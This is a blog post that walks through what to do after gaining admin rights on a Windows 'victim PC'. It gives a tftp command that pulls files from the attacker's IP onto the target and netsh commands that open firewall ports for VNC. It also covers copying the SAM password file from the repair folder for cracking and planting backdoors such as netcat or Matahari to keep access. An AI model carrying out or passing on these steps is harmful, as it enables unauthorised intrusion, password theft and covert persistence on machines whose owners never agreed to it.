What to do once you get in a remote PC

In this post I’ll write about what to do once you gain administrative privileges on a Windows PC. There’s lot that you can do, depending upon your inclinations (I hope benign).
Don’t ask me how to get admin rights in first place. Figure that out yourself.
Maybe I’ll write something on that someday, but not now.

Anyhow, once you get in open a windows command shell.
Here are a few things you might like to do:

1) Uploading/downloading files

First thing you might do is uploading a few files of your choice. TFTP (Trivial File Transfer Protocol) is an excellent choice for this.
You need to start tftp service/daemon on your PC first and place the files you want to upload in the programs working directory. In most linux versions, its /tmp

Type the following command to upload netsh.exe file.

C:WINDOWS>tftp -i 192.168.1.10 GET netsh.exe netsh.exe

Here

-i specifies binary transfer mode

GET tells the victim PC to fetch the file from remote PC. You can use PUT to copy data onto a remote PC

192.168.1.10 is your ip

First netsh.exe is the file you want to upload

Second netsh.exe is the filename you want to keep in victim PC. You can change it to anything you want.

2. Editing network settings

The file netsh.exe is a Windows program for editing network related settings of a PC. Most XP PCs don’t have it by default. You’ll have to upload it. In this case, it’s used to open certain ports in Windows Firewall, that otherwise could be blocked. VNC uses ports 5900 and 5800 for communications. You can edit the firewall setings to unblock these ports by using these commands:

netsh firewall set portopening tcp 5800

netsh firewall set portopening tcp 5900

netsh.exe firewall set portopening udp 5900

This is just an example. You can use this command to block or unblock any port. Keep in mind, unblocking a particular port doesn’t mean the service/program that usually uses the port will start working. For example, unblocking port 23 and trying telnet will be of no use, unless telnet service is started on that PC.

3). Copying SAM

SAM file contains list of all the users and corresponding passwords in Windows. Though it’s encryption can be hard to break depending upon password strength, it’s a very juicy target. There are quite a few paid and free software to do that. It’s default location is

C:windowssystem32config

It’s not possible to copy the SAM file directly as it’s a protected system file. But there is a loophole here too. A backup copy of SAM is almost always located in

C:windowsrepair

You can copy this file to your own PC unlike original SAM.

4). Uploading a back-door

A back-door program for example netcat is necessary if you want to keep unrestricted access. netcat is supposed to be a good program, but most anti-virus programs detect it very easily. So it’s slightly out of fashion. If that’s the case, you can try using some script based back-doors like Matahari. It’s a perl script. Only downside is that the target PC should have perl installed which most windows PCs don’t have.
Linux fares better in this case. Another good option is VNC.

That’s enough for now. Let me know if you have any suggestions or corrections.


Leave a Reply